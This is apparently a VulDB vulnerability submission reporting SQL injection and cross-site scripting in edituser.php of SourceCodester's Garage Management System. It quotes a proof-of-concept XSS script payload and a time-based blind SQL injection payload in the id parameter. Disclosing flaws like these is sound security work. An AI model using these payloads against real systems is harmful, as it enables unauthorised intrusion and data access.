提交 #42784: Garage Management System SQL injection exists信息

标题Garage Management System SQL injection exists
描述This is the download address of this management system: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html http://192.168.0.17/edituser.php?id=1 edituser.php has SQL injection vulnerability and XSS vulnerability http://192.168.0.17/edituser.php?id=1\"><ScRiPt>alert(1)</sCrIpT> This will pop up a box indicating the existence of XSS vulnerability http://192.168.0.17/edituser.php?id=1' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))OrTm) AND 'Sjdt'='Sjdt Use this payload to verify whether there are SQL injection vulnerabilities
用户
 Anonymous User
提交2022-08-03 19時01分 (4 年前)
管理2022-08-04 08時08分 (13 hours later)
状态已接受
VulDB条目205573 [SourceCodester Garage Management System edituser.php 标识符 跨网站脚本]
积分17

上一步一览下一步

Do you need the next level of professionalism?

Upgrade your account now!